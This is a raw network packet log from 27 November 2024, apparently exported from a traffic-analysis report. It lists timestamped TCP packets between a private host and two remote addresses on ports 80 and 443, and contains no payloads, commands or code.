                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.131333113 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.131333113 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.132709026 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.132944107 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.133023024 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.134510040 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.134721994 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.134793997 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.136141062 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.136776924 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.138046980 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.138154030 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.138271093 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.139486074 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.139524937 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.139746904 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.140714884 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.140790939 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.141705036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.141771078 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.141819954 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.141819954 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.141819954 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.143148899 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.143302917 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.144649029 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.144722939 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.145395041 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.145520926 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.145884037 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.145972967 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.146970987 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.147057056 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.148369074 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.148422956 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.148422956 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.148475885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.149652958 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.149697065 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.149738073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.150899887 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.151026964 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.151458979 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.151459932 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.152101040 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.152232885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.153214931 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.153347969 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.153390884 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.153390884 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.154650927 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.154764891 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.155891895 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.155977011 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.157083035 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.157130003 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.157130003 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.157181978 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.157396078 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.158143044 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.158194065 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.159260988 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.159287930 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.159332037 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.159332037 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.160228014 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.160412073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.161425114 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.163469076 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189337969 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189398050 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189469099 CET49793443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189681053 CET49793443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189701080 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189713001 CET49793443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.189718962 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.192513943 CET49798443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.192548037 CET4434979813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.192637920 CET49798443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.192789078 CET49798443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.192804098 CET4434979813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.216744900 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.227133989 CET4434979413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.229962111 CET49794443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.229983091 CET4434979413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.230443001 CET49794443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.230448961 CET4434979413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.268161058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.268187046 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.268358946 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.268743992 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.268867016 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.268944979 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.269910097 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.269968987 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.270040989 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.271752119 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.271817923 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.273108006 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.273199081 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.273238897 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.273439884 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.274590015 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.274735928 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.274848938 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.275605917 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.275676012 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.275747061 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.276696920 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.276772022 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.276896954 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.277666092 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.277755976 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.277869940 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.278670073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.278768063 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.278894901 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.279654980 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.279742002 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.280848980 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.280894041 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.280988932 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.280988932 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.281894922 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.282090902 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.282159090 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.283090115 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.283174038 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.283231974 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.284123898 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.284202099 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.285265923 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.285346031 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.285357952 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.285484076 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.286423922 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.286535025 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.286587000 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.287543058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.287626982 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.287729979 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.288635015 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.288753033 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.288815975 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.289793015 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.289849043 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.289948940 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.291147947 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.291215897 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.291418076 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.292094946 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.292224884 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.292380095 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.293059111 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.293122053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.293323040 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.294166088 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.294249058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.294321060 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.295348883 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.295511961 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.295608997 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.296463013 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.296576977 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.296634912 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.297697067 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.297964096 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.298003912 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.298763037 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.298861980 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.298957109 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.299765110 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.299990892 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.300170898 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.300968885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.301048994 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.301120043 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.301954985 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.302073956 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.302196026 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.303065062 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.303180933 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.303227901 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.304233074 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.304244995 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.304629087 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.305282116 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.305367947 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.305417061 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.306385994 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.306540966 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.306644917 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.307526112 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.307651043 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.307727098 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.308605909 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.308674097 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.308819056 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.309762001 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.309854031 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.309973001 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.310839891 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.310904026 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.311080933 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.311943054 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.312046051 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.312108040 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.313076019 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.313126087 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.313222885 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.314256907 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.314397097 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.314500093 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.315310001 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.315412998 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.315457106 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.316407919 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.316488028 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.316613913 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.317492008 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.317574024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.317634106 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.318656921 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.318811893 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.318933964 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.319842100 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.320061922 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.320199966 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.320894003 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.321038008 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.321125984 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.321997881 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.322139978 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.322227955 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.323252916 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.323308945 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.323405027 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.324182987 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.324297905 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.324383020 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.325329065 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.325412035 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.325498104 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.326417923 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.326527119 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.326622963 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.327507019 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.372941017 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.468473911 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.468544006 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.468658924 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.468962908 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.469073057 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.469134092 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.470040083 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.470132113 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.470211983 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.471120119 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.471146107 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.471271038 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.472192049 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.472280979 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.472326040 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.473305941 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.473383904 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.473510981 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.474383116 CET8049792185.215.113.16192.168.2.10
